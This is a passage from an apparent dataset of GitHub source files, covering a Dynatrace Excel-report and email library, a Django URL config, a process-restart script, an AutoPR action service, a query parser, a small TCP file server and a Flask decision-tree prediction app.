'{\"' + dims_data[dim] + '\":'\n dstr = (\n dstr\n + '{\"'\n + metric_name.strip()\n + '\":'\n + str(values).strip()\n + \"}\"\n )\n for _idx in dims_trans:\n dstr = dstr.strip() + \"}\"\n _data = ast.literal_eval(dstr.strip())\n\n self.deep_update(trans, _data)\n return trans\n\n\nclass cls_report(object):\n def __init__(self, config=None, report_name=None):\n self.output_path = config.output_path\n\n credentials = config.config_to_dict(\"credentials\")\n report = config.config_to_dict(\"report\")\n\n self.time_zone = report.get(\"time_zone\", tzlocal.get_localzone().zone)\n self.prepared_for = report.get(\"prepared_for\", credentials.get(\"tenant\", \"\"))\n self.file_ident = report.get(\"file_ident\", False)\n\n self.email_config = config.config_to_dict(\"email_config\")\n\n self.report_date = None\n\n self._loc = collections.namedtuple(\"loc\", \"row,col\")\n self.header = collections.namedtuple(\"header\", 
\"col_title,col_format,col_width\")\n self.max_col = 3\n self.max_row = None\n\n self.blue = \"#5B9BD5\"\n self.font_yellow = \"#9C5700\"\n self.bg_yellow = \"#FFEB9C\"\n self.font_red = \"#9C0006\"\n self.bg_red = \"#FFC7CE\"\n self.font_green = \"#006100\"\n self.bg_green = \"#C6EFCE\"\n\n if report_name:\n self.xl_workbook(report_name)\n\n def xl_workbook(self, report_name):\n self.report_name = re.sub(\"[^0-9a-zA-Z]+\", \"_\", report_name)\n self.report_file = os.path.join(self.output_path, self.report_name + \".xlsx\")\n self.workbook = xlsxwriter.Workbook(\n self.report_file, {\"strings_to_urls\": False}\n )\n\n self.title_format = self.workbook.add_format(\n {\n \"align\": \"center\",\n \"bold\": True,\n \"text_wrap\": True,\n \"bg_color\": self.blue,\n \"border\": True,\n \"font_size\": 14,\n }\n )\n self.sub_title_format = self.workbook.add_format(\n {\n \"align\": \"left\",\n \"bold\": True,\n \"text_wrap\": True,\n \"border\": True,\n \"font_size\": 12,\n }\n )\n self.label_format = self.workbook.add_format(\n {\"align\": \"left\", \"font_size\": 10, \"border\": True, \"text_wrap\": True}\n )\n self.data_format = self.workbook.add_format(\n {\"align\": \"right\", \"font_size\": 10, \"border\": True, \"num_format\": \"0.00\"}\n )\n self.data_green_format = self.workbook.add_format(\n {\n \"align\": \"right\",\n \"font_color\": self.font_green,\n \"bg_color\": self.bg_green,\n \"font_size\": 10,\n \"border\": True,\n \"num_format\": \"0.00\",\n }\n )\n self.data_yellow_format = self.workbook.add_format(\n {\n \"align\": \"right\",\n \"font_color\": self.font_yellow,\n \"bg_color\": self.bg_yellow,\n \"font_size\": 10,\n \"border\": True,\n \"num_format\": \"0.00\",\n }\n )\n self.data_red_format = self.workbook.add_format(\n {\n \"align\": \"right\",\n \"font_color\": self.font_red,\n \"bg_color\": self.bg_red,\n \"font_size\": 10,\n \"border\": True,\n \"num_format\": \"0.00\",\n }\n )\n self.percent_format = self.workbook.add_format(\n {\"align\": \"right\", \"font_size\": 10, \"border\": True, \"num_format\": \"0.00%\"}\n )\n self.count_format = self.workbook.add_format(\n {\"align\": \"right\", \"font_size\": 10, \"border\": True, \"num_format\": \"0\"}\n )\n self.date_format = self.workbook.add_format(\n {\n \"align\": \"right\",\n \"font_size\": 10,\n \"border\": True,\n \"num_format\": \"mm-dd-yyyy\",\n }\n )\n self.cell_label_format = self.workbook.add_format({\"text_wrap\": False})\n self.cell_data_format = self.workbook.add_format({\"num_format\": \"0.00\"})\n self.cell_percent_format = self.workbook.add_format({\"num_format\": \"0.00%\"})\n self.cell_count_format = self.workbook.add_format({\"num_format\": \"0\"})\n self.cell_date_format = self.workbook.add_format({\"num_format\": \"mm-dd-yyyy\"})\n\n @staticmethod\n def accumulate(data, metric):\n accumulator = None\n count = 0\n if data:\n for k, v in data.items():\n if metric in v:\n if v[metric] is not None:\n if accumulator is None:\n accumulator = v[metric]\n else:\n accumulator = accumulator + v[metric]\n count += 1\n return accumulator, count\n\n def format_timestamp(self, tstamp):\n tstamp_ts = datetime.datetime.fromtimestamp(int(tstamp) / 1000)\n tstamp_ts = tstamp_ts.astimezone(self.report_date.tz)\n if self.report_date.resolution in [\"1h\"]:\n timestamp = tstamp_ts.strftime(\"%H\")\n else:\n timestamp = tstamp_ts.strftime(\"%m-%d-%Y\")\n return timestamp\n\n def timestamp_header(self):\n if self.report_date.resolution in [\"1h\"]:\n header = [\n self.header(\n col_title=\"timestamp\",\n 
col_format=self.cell_label_format,\n col_width=25,\n )\n ]\n else:\n header = [\n self.header(\n col_title=\"timestamp\",\n col_format=self.cell_date_format,\n col_width=25,\n )\n ]\n return header\n\n def xl_add_sheet(self, sheet_name=None, default_row_height=18):\n if sheet_name:\n sheet_name = re.sub(\"[^0-9a-zA-Z]+\", \"\", sheet_name)[:30]\n worksheet = self.workbook.add_worksheet(sheet_name)\n worksheet.set_column(0, 0, 2)\n worksheet.set_default_row(height=default_row_height)\n else:\n worksheet = self.workbook.add_worksheet()\n return worksheet\n\n def xl_title_block(\n self,\n worksheet,\n anchor,\n title,\n compact=False,\n title_data=None,\n title_format=None,\n sub_title_format=None,\n ):\n if title_format:\n title_format = self.workbook.add_format(title_format)\n else:\n title_format = self.title_format\n if sub_title_format:\n sub_title_format = self.workbook.add_format(sub_title_format)\n else:\n sub_title_format = self.sub_title_format\n row = anchor.row\n col = anchor.col\n _title_data = title_data\n prepared_for = self.prepared_for\n refresh_date = datetime.datetime.now().strftime(\"%d-%b-%Y %H:%M\")\n time_period = self.report_date.time_period if self.report_date else refresh_date\n worksheet.set_row(row, 18)\n worksheet.merge_range(row, col, row, self.max_col, title, title_format)\n if compact:\n title_data = [\"Timeperiod: \" + time_period]\n else:\n title_data = [\n \"Prepared for: \" + prepared_for,\n \"Refresh date: \" + refresh_date,\n \"Timeperiod: \" + time_period,\n ]\n if _title_data:\n title_data = title_data + _title_data\n for row_data in title_data:\n row += 1\n worksheet.set_row(row, 18)\n worksheet.merge_range(\n row, col, row, self.max_col, row_data, sub_title_format\n )\n self.max_row = row\n\n def xl_table_block(self, worksheet, anchor, header, data, title_row_height=None):\n col_fmt = {}\n col = anchor.col\n row = anchor.row\n for col_data in header:\n worksheet.write(row, col, col_data.col_title, self.title_format)\n col_fmt[col] = col_data.col_format\n worksheet.set_column(col, col, col_data.col_width)\n col += 1\n if title_row_height:\n worksheet.set_row(row, title_row_height)\n for row_data in data:\n col = anchor.col\n row += 1\n for value in row_data:\n if value is None:\n value = \"\"\n worksheet.write(row, col, value, col_fmt[col])\n col += 1\n self.max_row = row\n self.max_col = col\n\n def xl_chart_block(\n self,\n worksheet,\n anchor,\n header,\n data,\n title,\n chart_type,\n data_cols,\n height,\n width,\n no_legend=False,\n legend_pos=\"bottom\",\n ):\n _series = collections.namedtuple(\"series\", \"name,categories,values\")\n fudge = 5\n data_anchor = self._loc(row=0, col=0)\n data_sheet = self.workbook.add_worksheet()\n if not data:\n data = [\"\", \"\"]\n data_cols = [1]\n no_legend = True\n self.xl_table_block(data_sheet, data_anchor, header, data)\n chart = self.workbook.add_chart({\"type\": chart_type})\n\n for data_col in data_cols:\n name = (\n \"=\"\n + data_sheet.name\n + \"!\"\n + xlsxwriter.utility.xl_rowcol_to_cell(0, data_col, True, True)\n )\n categories = (\n \"=\"\n + data_sheet.name\n + \"!\"\n + xlsxwriter.utility.xl_range_abs(1, 0, self.max_row, 0)\n )\n values = (\n \"=\"\n + data_sheet.name\n + \"!\"\n + xlsxwriter.utility.xl_range_abs(1, data_col, self.max_row, data_col)\n )\n series = _series(name=name, categories=categories, values=values)\n chart.add_series(\n {\n \"name\": series.name,\n \"marker\": {\"type\": \"square\"},\n \"categories\": series.categories,\n \"values\": series.values,\n }\n )\n\n 
chart.set_y_axis({\"min\": 0})\n chart.set_x_axis({\"name\": \"\"})\n chart.set_title({\"name\": title})\n chart.set_legend({\"position\": legend_pos})\n chart.set_size({\"height\": height, \"width\": width})\n if no_legend:\n chart.set_legend({\"none\": True})\n worksheet.insert_chart(\n anchor.row, anchor.col, chart, {\"x_offset\": fudge, \"y_offset\": 0}\n )\n data_sheet.hide()\n\n def xl_close(self):\n while True:\n try:\n self.workbook.close()\n except xlsxwriter.exceptions.FileCreateError as e:\n decision = input(\n \"Exception caught in workbook.close(): %s\\n\"\n \"Please close the file if it is open in Excel.\\n\"\n \"Try to write file again? [Y/n]: \" % e\n )\n if decision != \"n\":\n continue\n break\n\n @staticmethod\n def check_email_config(email_config):\n check = True\n fields = [\n \"email_server\",\n \"email_port\",\n \"email_server_username\",\n \"email_server_password\",\n \"email_from\",\n ]\n for check_field in fields:\n if check_field not in email_config:\n check = False\n return check\n\n def send_mail(self, notification_name, synth):\n if self.check_email_config(self.email_config):\n if self.report_date:\n time_period = self.report_date.time_period\n else:\n time_period = datetime.datetime.now().strftime(\"%d-%b-%Y %H:%M %Z\")\n email_text = \"Report: {}\\nDate range: {}\".format(\n self.report_name, time_period\n )\n data = synth.get_notifications()\n for notification in data[\"values\"]:\n if notification[\"name\"] == notification_name:\n notification_id = notification[\"id\"]\n break\n if notification_id:\n data = synth.get_notification(notification_id)\n receivers = data[\"receivers\"]\n cc_receivers = data[\"ccReceivers\"]\n msg = MIMEMultipart()\n msg[\"From\"] = self.email_config[\"email_from\"]\n msg[\"To\"] = COMMASPACE.join(receivers + cc_receivers)\n msg[\"Subject\"] = self.report_name + \" for: \" + time_period\n try:\n msg.attach(MIMEText(email_text, \"plain\"))\n attachment = open(self.report_file, \"rb\")\n payload = MIMEBase(\"application\", \"octet-stream\")\n payload.set_payload((attachment).read())\n encoders.encode_base64(payload)\n payload.add_header(\n \"Content-Disposition\",\n \"attachment; filename= %s\" % self.report_name + \".xlsx\",\n )\n msg.attach(payload)\n session = smtplib.SMTP(\n self.email_config[\"email_server\"],\n self.email_config[\"email_port\"],\n )\n session.starttls()\n session.login(\n self.email_config[\"email_server_username\"],\n self.email_config[\"email_server_password\"],\n )\n text = msg.as_string()\n session.sendmail(self.email_config[\"email_from\"], receivers, text)\n session.quit()\n except smtplib.SMTPException as error:\n logging.error(\n \"Problem with SMTP server: \" + error.smtp_error.decode(\"utf-8\")\n )\n else:\n print(\"No notification of \" + notification_name + \" found\")\n logging.error(\"No notification of \" + notification_name + \" found\")\n else:\n print(\"SMTP server settings are not correct. Check config\")\n logging.error(\"SMTP server settings are not correct. 
Check config\")\n\n\nif __name__ == \"__main__\":\n config = cls_config()\n synth = cls_synth(config)\n report = cls_report(config)\n","repo_name":"Dynatrace/snippets","sub_path":"api/synthetic/Service_Level_Summary/_synth_lib.py","file_name":"_synth_lib.py","file_ext":"py","file_size_in_byte":45562,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"16764992792","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import include, path\n\n\n\n\nurlpatterns = [\n path('', include('apps.accounts.urls')),\n path('', include('apps.shop.urls')),\n path('', include('apps.utils.urls')),\n path('admin-store/', include('apps.adminstore.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"anferubu/tecnobox","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"794411623","text":"import time\nimport subprocess as sub\nimport os\n\nexp_running = 'project1/experiments_all.py'\ncount = 0\n\ntime.sleep(1)\nprint('Hello this is the exp_wrapper!')\n\nwhile True:\n if count > 20:\n print('Restarted 20 times, killing process to be safe.')\n break\n process = sub.run(['pgrep', '-af', 'python'], stdout=sub.PIPE, stderr=sub.PIPE)\n time.sleep(10)\n if exp_running in process.stdout.decode():\n pass\n else:\n time.sleep(11)\n process = sub.run(['pgrep', '-af', 'python'], stdout=sub.PIPE, stderr=sub.PIPE)\n if exp_running in process.stdout.decode():\n print('Lol, saved it.')\n continue\n #os.system('conda activate ts')\n os.system(f'nohup python {exp_running} &')\n print('Restarted script.')\n count += 1\n\n print('Experiments running. 
Sleeping for 60s.')\n time.sleep(60)","repo_name":"marcoHoev/time-series","sub_path":"project1/exp_wrapper.py","file_name":"exp_wrapper.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9461395406","text":"import asyncio\nimport json\nimport traceback\nimport typing\nfrom typing import Any, Optional, Collection, Type, TypeVar, Iterable\n\nimport jinja2\nimport pydantic\nfrom git.repo import Repo\nfrom pydantic import ValidationError, BaseModel\n\nfrom autopr.actions.base import get_actions_dict, Action, Outputs, Inputs\nfrom autopr.log_config import get_logger\nfrom autopr.models.config.transform import TransformsInto\nfrom autopr.models.executable import ContextDict, ExecutableId\n\nfrom autopr.models.config.elements import ActionConfig, IterableActionConfig, ValueDeclaration\nfrom autopr.services.cache_service import CacheService, ShelveCacheService\nfrom autopr.services.commit_service import CommitService\nfrom autopr.services.platform_service import PlatformService\nfrom autopr.services.publish_service import PublishService\nfrom autopr.services.utils import truncate_strings, format_for_publishing\n\nActionSubclass = Action[Any, Any]\n\n\nclass ActionService:\n # class Finished(Action):\n # id = \"finished\"\n\n def __init__(\n self,\n repo: Repo,\n cache_dir: str,\n platform_service: PlatformService,\n commit_service: CommitService,\n num_reasks: int = 3,\n ):\n self.repo = repo\n self.cache_dir = cache_dir\n self.platform_service = platform_service\n self.commit_service = commit_service\n self.num_reasks = num_reasks\n\n # Load all actions in the `autopr/actions` directory\n self.actions: dict[ExecutableId, type[ActionSubclass]] = get_actions_dict()\n\n self.log = get_logger(service=\"action_service\")\n\n def find_action(self, id_: ExecutableId) -> Optional[type[Action[Any, Any]]]:\n if id_ in self.actions:\n return self.actions[id_]\n return None\n\n def instantiate_action(\n self,\n action_type: Type[Action[Inputs, Outputs]],\n publish_service: PublishService,\n ) -> Action[Inputs, Outputs]:\n cache_service = ShelveCacheService(\n cache_dir=self.cache_dir,\n action_id=action_type.id,\n )\n return action_type(\n repo=self.repo,\n publish_service=publish_service,\n platform_service=self.platform_service,\n commit_service=self.commit_service,\n cache_service=cache_service,\n )\n\n def get_action_inputs(\n self,\n action_type: Type[Action[Inputs, Outputs]],\n action_inputs: Inputs,\n context: ContextDict,\n ) -> Optional[Inputs]:\n # Get the inputs\n inputs_type = action_type._get_inputs_type()\n if isinstance(None, inputs_type):\n inputs = None\n else:\n if action_inputs is None:\n specified_inputs = {}\n else:\n specified_inputs = action_inputs\n\n input_values = {}\n for input_name, template in specified_inputs:\n # resolve prompt contexts\n if isinstance(template, TransformsInto):\n template = template.transform_from_config(template, context)\n # resolve variable declarations\n elif any(isinstance(template, t) for t in typing.get_args(ValueDeclaration)):\n template = template.render(context)\n # resolve string as template (backwards compatibility, should be removed)\n elif isinstance(template, str):\n template = context.render_nested_template(template)\n\n if isinstance(template, pydantic.BaseModel):\n template = template.dict()\n\n if template is not None:\n input_values[input_name] = template\n\n try:\n inputs = inputs_type(**input_values) # pyright: 
ignore[reportGeneralTypeIssues]\n except ValidationError as e:\n raise ValueError(f\"Invalid inputs for {action_type.id}:\\n\\n{e}\") from e\n\n return inputs\n\n async def _instantiate_and_run_action(\n self,\n action_type: Type[Action[Inputs, Outputs]],\n action_id: str,\n inputs: Inputs,\n publish_service: PublishService,\n ):\n if inputs is not None:\n formatted_inputs = format_for_publishing(inputs)\n else:\n formatted_inputs = \"None\"\n await publish_service.publish_code_block(\"Inputs\", formatted_inputs, language=\"json\")\n\n # Instantiate the action\n action = self.instantiate_action(\n action_type=action_type,\n publish_service=publish_service,\n )\n\n # Run the action\n try:\n outputs = await action.run(inputs)\n except Exception:\n self.log.exception(f\"Failed to run action {action_id}\")\n await publish_service.publish_code_block(\n heading=\"Error\",\n code=traceback.format_exc(),\n language=\"python\", # FIXME\n # does nice syntax highlighting for tracebacks, but should be made configurable\n )\n await publish_service.end_section(f\"❌ Failed {action_id}\")\n raise\n\n return outputs\n\n async def run_action(\n self,\n action_config: ActionConfig,\n context: ContextDict,\n publish_service: PublishService,\n ) -> ContextDict:\n action_id = action_config.action\n section_title = f\"💧 Running `{action_id}`\"\n await publish_service.start_section(section_title)\n\n action_type = self.actions[action_id]\n\n # Get inputs\n inputs = self.get_action_inputs(action_type, action_config.inputs, context)\n\n # Run action\n outputs = await self._instantiate_and_run_action(\n action_type=action_type,\n action_id=action_id,\n inputs=inputs,\n publish_service=publish_service,\n )\n\n if outputs is not None:\n # Publish raw outputs\n await publish_service.publish_code_block(\n \"Outputs\",\n format_for_publishing(outputs),\n language=\"json\",\n )\n\n # Extract outputs\n new_context = {\n context_key: getattr(outputs, output_name)\n for output_name, context_key in action_config.outputs or {}\n if context_key is not None\n }\n\n if new_context:\n # Publish outputs\n await publish_service.publish_code_block(\n \"New Variables\",\n format_for_publishing(new_context),\n language=\"json\",\n )\n\n # End the section\n if publish_service.sections_stack[-1].title == section_title:\n await publish_service.end_section(f\"💧 Finished running `{action_id}`\")\n else:\n await publish_service.end_section()\n\n return ContextDict(new_context)\n\n async def run_action_iteratively(\n self,\n iter_action_config: IterableActionConfig,\n context: ContextDict,\n publish_service: PublishService,\n ) -> ContextDict:\n action_id = iter_action_config.action\n section_title = f\"💦 Iteratively running `{action_id}`\"\n await publish_service.start_section(section_title)\n\n action_type = self.actions[action_id]\n\n iteration = iter_action_config.iterate\n if isinstance(iteration, int):\n # iterate `iteration` times\n item_name = iter_action_config.as_\n iter_context = context\n coros = []\n for i in range(iteration):\n if item_name is not None:\n iter_context = ContextDict(iter_context | {item_name: i})\n\n # Get inputs\n inputs = self.get_action_inputs(\n action_type, iter_action_config.inputs, iter_context\n )\n\n coros.append(\n self._instantiate_and_run_action(\n action_type=action_type,\n action_id=action_id,\n inputs=inputs,\n publish_service=await publish_service.create_child(f\"💧 Iteration {i+1}\"),\n )\n )\n else: # isinstance(iteration, ContextVarPath)\n # iterate over a list in the context\n list_var = 
context.get_path(iteration)\n if not isinstance(list_var, Iterable):\n raise ValueError(f\"Expected {iteration} to be an iterable\")\n\n # Get inputs including the list item\n item_name = iter_action_config.as_\n if item_name is None:\n raise ValueError(\"Expected `as` to be specified for action iterating over a list\")\n coros = []\n for item in list_var:\n iter_context = ContextDict(context | {item_name: item})\n inputs = self.get_action_inputs(\n action_type, iter_action_config.inputs, iter_context\n )\n coros.append(\n self._instantiate_and_run_action(\n action_type=action_type,\n action_id=action_id,\n inputs=inputs,\n publish_service=await publish_service.create_child(\n title=f\"💧 Iteration: `{truncate_strings(str(item), length=40)}`\"\n ),\n )\n )\n\n # Gather the action runs\n outputses = await asyncio.gather(*coros)\n\n # Extract outputs\n new_context = {}\n for output_name, context_key in iter_action_config.list_outputs or {}:\n if context_key is None:\n continue\n new_context[context_key] = [getattr(outputs, output_name) for outputs in outputses]\n\n await publish_service.publish_code_block(\n \"Outputs\",\n format_for_publishing(new_context),\n language=\"json\",\n )\n\n # End the section\n if publish_service.sections_stack[-1].title == section_title:\n await publish_service.end_section(f\"💦 Finished iterating `{action_id}`\")\n else:\n await publish_service.end_section()\n\n return ContextDict(new_context)\n","repo_name":"irgolic/AutoPR","sub_path":"autopr/services/action_service.py","file_name":"action_service.py","file_ext":"py","file_size_in_byte":10247,"program_lang":"python","lang":"en","doc_type":"code","stars":1126,"dataset":"github-code","pt":"37"} +{"seq_id":"4277375356","text":"# coding: utf-8\n'''\nQuery string to database query conversion.\n'''\n\nimport re\nimport canvas as cv\n\n_query_string_operators = list()\ndef query_string_operator(regex):\n\tdef register_operator(meth):\n\t\t_query_string_operators.append((regex, meth))\n\t\treturn meth\n\treturn register_operator\n\n@query_string_operator(r'^not\\(([\\w\\s]+)\\)$')\ndef invert_operator(match, column, parse):\n\treturn column != parse(match.group(1))\n\n@query_string_operator(r'^in\\((.*?),(.*?)\\)$')\ndef range_operator(match, column, parse):\n\treturn (\n\t\t(column >= parse(match.group(1))) & \n\t\t(column < parse(match.group(2)))\n\t).grouped\n\ndef query_to_query(model_cls, query_string, default_variant=None):\n\t'''Convert a query string to a canvas ORM query, distrusting the client.'''\n\ttable = model_cls.__table__\n\n\tdef protect_key(key):\n\t\twhile key in table.columns:\n\t\t\tkey = ''.join(('_', key))\n\t\treturn key\n\t#\tDefine the query modifier keys without namespace conflict.\n\tcount_key = protect_key('count')\n\toffset_key = protect_key('offset')\n\torder_key = protect_key('order')\n\tvariant_key = protect_key('variant')\n\n\t#\tPrepare default values.\n\tquery_condition = True\n\tquery_target = model_cls if not default_variant else default_variant(model_cls)\n\tcount = offset = None\n\torder = list()\n\n\t#\tIterate the query string, inspecting each item.\n\tfor key, value in query_string.items():\n\t\t#\tCheck query modifiers.\n\t\tif key == count_key:\n\t\t\ttry:\n\t\t\t\tcount = int(value)\n\t\t\texcept:\n\t\t\t\traise cv.BadRequest('\"%s\" must be an integer'%count_key)\n\t\telif key == offset_key:\n\t\t\ttry:\n\t\t\t\toffset = int(value)\n\t\t\texcept:\n\t\t\t\traise cv.BadRequest('\"%s\" must be an integer'%offset_key)\n\t\telif key == order_key:\n\t\t\tattr, desc = value, 
True\n\t\t\tdescending = desc  # default direction when no explicit (asc|desc) suffix is given\n\t\t\tmatch = re.match(r'^(\w+)(?:\((asc|desc)(?:ending){0,1}\)){0,1}$', value)\n\t\t\tif match:\n\t\t\t\tattr = match.group(1)\n\t\t\t\tdescending = match.group(2) == 'desc'\n\n\t\t\tif attr not in table.columns:\n\t\t\t\traise cv.BadRequest('Invalid order \"%s\"'%attr)\n\n\t\t\torder.append(getattr(table.columns[attr], 'desc' if descending else 'asc'))\n\t\telif key == variant_key:\n\t\t\tquery_target = getattr(model_cls, value, None)\n\t\t\tif not query_target or not getattr(query_target, '__restquery__', False):\n\t\t\t\traise cv.BadRequest('No query variant \"%s\"'%value)\n\t\t\tquery_target = query_target()\n\t\telse:\n\t\t\tcolumn = table.columns.get(key)\n\t\t\tif not column:\n\t\t\t\traise cv.BadRequest('Invalid key \"%s\"'%key)\n\t\t\t\n\t\t\tdef parse_value(one):\n\t\t\t\tif one == 'null':\n\t\t\t\t\treturn None\n\t\t\t\treturn column.cast(one)\n\t\t\t\n\t\t\tdef parse_one(one):\n\t\t\t\tfor operator in _query_string_operators:\n\t\t\t\t\tmatch = re.match(operator[0], one)\n\t\t\t\t\tif match:\n\t\t\t\t\t\treturn operator[1](match, column, parse_value)\n\t\t\t\treturn column == parse_value(one)\n\n\t\t\tquery_condition = query_condition & parse_one(value)\n\n\treturn query_target, query_condition, order, offset, count","repo_name":"robinsax/canvas-plugin-multirepo","sub_path":"cvpl-restful/restful/ops/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74752651946","text":"# Program to extract number of columns in Python \nimport xlrd \n \nloc = (\"F:/emp.xlsx\") \n \nwb = xlrd.open_workbook(loc) \nsheet = wb.sheet_by_index(0) \n \n# For row 0 and column 0 \nsheet.cell_value(0, 0) \n \n# Extracting number of columns \nprint(sheet.ncols) \n","repo_name":"Shashivardhan3/python","sub_path":"excel module/6 reading no of cols.py","file_name":"6 reading no of cols.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"9461395406","text":"import socket;\n\n\n\ndef sendFile2Client(newClientSocket , clientAddr):\n    # Receive the name of the file the client wants to download\n    fileName = newClientSocket.recv(1024).decode(\"utf-8\");\n    print(\"客户端(%s)需要下载的文件是 : %s \" % (str(clientAddr), fileName));\n\n    fileContent = None;\n    # Open the file and read its data\n    try:\n        f = open(fileName,\"rb\");\n        fileContent = f.read();\n        f.close();\n    except Exception as ret:\n        print(\"没有药下载的文件(%s) \" % fileName);\n\n    # Send the file data to the client\n    newClientSocket.send(fileContent);\n\n\n\ndef execute():\n    # 1. Create the socket\n    tcpServerSocket = socket.socket(socket.AF_INET , socket.SOCK_STREAM);\n\n    # 2. Bind the local address information\n    tcpServerSocket.bind((\"\",7890));\n\n    # 3. Switch the default socket from active to passive (listening) mode\n    tcpServerSocket.listen(128);\n\n\n    while True:\n        # 4. Wait for a client connection (accept)\n        newClientSocket , clientAddr = tcpServerSocket.accept();\n\n\n        # 5. Send the file data to the client\n        sendFile2Client(newClientSocket,clientAddr);\n\n        # 6. Close the client socket\n        newClientSocket.close();\n    tcpServerSocket.close();\n\n\n\nif __name__ == '__main__':\n    execute();","repo_name":"ht5678/yzh-learn","sub_path":"demo-python/base/demo/network/tcpFileServer.py","file_name":"tcpFileServer.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"41923459990","text":"import csv\nfrom flask import Flask, request, render_template, flash, session, jsonify\nimport os\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom 
sklearn.metrics import accuracy_score, classification_report, confusion_matrix\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.tree import DecisionTreeClassifier\n\napp = Flask(__name__)\napp.secret_key = 'your_secret_key_here'\n\n# Function to process the standings (klasemen) CSV file\n\n\ndef process_csv_file(file_path):\n    data = []\n    with open(file_path, 'r') as csvfile:\n        csvreader = csv.reader(csvfile, delimiter=';')\n        headers = next(csvreader)\n        for row in csvreader:\n            data.append(row)\n    return headers, data\n\n# Function to process the match (pertandingan) CSV file\n\n\ndef process_csv_file_match(file_path):\n    data = []\n    with open(file_path, 'r') as csvfile:\n        csvreader = csv.reader(csvfile, delimiter=';')\n        headers = next(csvreader)\n        for row in csvreader:\n            data.append(row)\n    return headers, data\n\n# Function to run the prediction and compute the standings accuracy\n\n\ndef predict_and_evaluate(file_path, data_input):\n    dataset = pd.read_csv(file_path, delimiter=';', header=0)\n    dataset = dataset.drop(labels=\"nama_tim\", axis=1)\n\n    enc = LabelEncoder()\n    dataset['kualitas_pelatih'] = enc.fit_transform(\n        dataset['kualitas_pelatih'].values)\n\n    attr_dataset = dataset.drop(columns='status')\n    cls_dataset = dataset['status']\n\n    xtrain, xtest, ytrain, ytest = train_test_split(\n        attr_dataset, cls_dataset, test_size=None, random_state=1)\n    tree_dataset = DecisionTreeClassifier(random_state=1)\n    tree_dataset.fit(xtrain, ytrain)\n\n    ypred = tree_dataset.predict(data_input)\n\n    # akurasi = accuracy_score(ytest, ypred)\n\n    return ypred[0]\n\n\ndef predict_and_evaluate1(file_path):\n    dataset = pd.read_csv(file_path, delimiter=';', header=0)\n\n    # Drop the \"nama_tim\" column\n    dataset = dataset.drop(labels=\"nama_tim\", axis=1)\n\n    # Encode the 'kualitas_pelatih' column\n    enc = LabelEncoder()\n    dataset['kualitas_pelatih'] = enc.fit_transform(\n        dataset['kualitas_pelatih'].values)\n\n    attr_dataset = dataset.drop(columns='status')\n    cls_dataset = dataset['status']\n\n    xtrain, xtest, ytrain, ytest = train_test_split(\n        attr_dataset, cls_dataset, test_size=0.2, random_state=1)\n    tree_dataset = DecisionTreeClassifier(random_state=1)\n    tree_dataset.fit(xtrain, ytrain)\n\n    ypred = tree_dataset.predict(xtest)\n    akurasi = accuracy_score(ytest, ypred)\n    classification_report_str = classification_report(\n        ytest, ypred, zero_division=1)\n\n    return akurasi, classification_report_str\n\n# Function to run the prediction and compute the match accuracy\n\n\ndef predict_and_evaluate_match(file_path):\n    dataset = pd.read_csv(file_path, delimiter=';', header=0)\n\n    # Drop the \"pertandingan\" column\n    dataset = dataset.drop(columns=\"pertandingan\", axis=1)\n\n    attr_dataset = dataset.drop(columns='hasil')\n    cls_dataset = dataset['hasil']\n\n    xtrain, xtest, ytrain, ytest = train_test_split(\n        attr_dataset, cls_dataset, test_size=0.2, random_state=1)\n    tree_dataset = DecisionTreeClassifier(criterion='entropy')\n    tree_dataset.fit(xtrain, ytrain)\n\n    ypred = tree_dataset.predict(xtest)\n    akurasi = accuracy_score(ytest, ypred)\n    classification_report_str = classification_report(\n        ytest, ypred, zero_division=1)\n\n    return akurasi, classification_report_str\n# Function to run the prediction for manually entered match data\n\n\ndef predict_and_evaluate_match_input(file_path, data_input):\n    dataset = pd.read_csv(file_path, delimiter=';', header=0)\n    dataset = dataset.drop(labels=\"pertandingan\", axis=1)\n\n    attr_dataset = dataset.drop(columns='hasil')\n    cls_dataset = dataset['hasil']\n\n    xtrain, xtest, ytrain, ytest = train_test_split(\n        
attr_dataset, cls_dataset, test_size=0.9, random_state=1)\n    tree_dataset = DecisionTreeClassifier(random_state=1)\n    tree_dataset.fit(xtrain, ytrain)\n\n    ypred = tree_dataset.predict(data_input)\n\n    # akurasi = accuracy_score(ytest, ypred)\n\n    return ypred[0]\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_csv():\n    akurasi = 0\n    classification_report_str = \"\"\n\n    if request.method == 'POST':\n        file = request.files['csv_file']\n        if file and file.filename.endswith('.csv'):\n            filename = file.filename\n            file.save(os.path.join('uploads/klasemen', filename))\n            flash(f'File {filename} berhasil diunggah.', 'success')\n\n            headers, data_rows = process_csv_file(\n                os.path.join('uploads/klasemen', filename))\n\n            # Predict and evaluate the results\n            akurasi, classification_report_str = predict_and_evaluate1(\n                os.path.join('uploads/klasemen', filename))\n        else:\n            flash(\n                f'File {file.filename} gagal diunggah. File yang diunggah harus berformat .csv.', 'error')\n            headers, data_rows = [], []\n    else:\n        headers, data_rows = [], []\n\n    return render_template('index.html', headers=headers, data_rows=data_rows, akurasi=akurasi*100, classification_report_str=classification_report_str)\n\n# Function to process the match dataset\n\n\n@app.route('/prediksi', methods=['GET', 'POST'])\ndef upload_csv_match():\n    akurasi = 0\n    classification_report_str = \"\"\n\n    if request.method == 'POST':\n        file = request.files['csv_file']\n        if file and file.filename.endswith('.csv'):\n            filename = file.filename\n            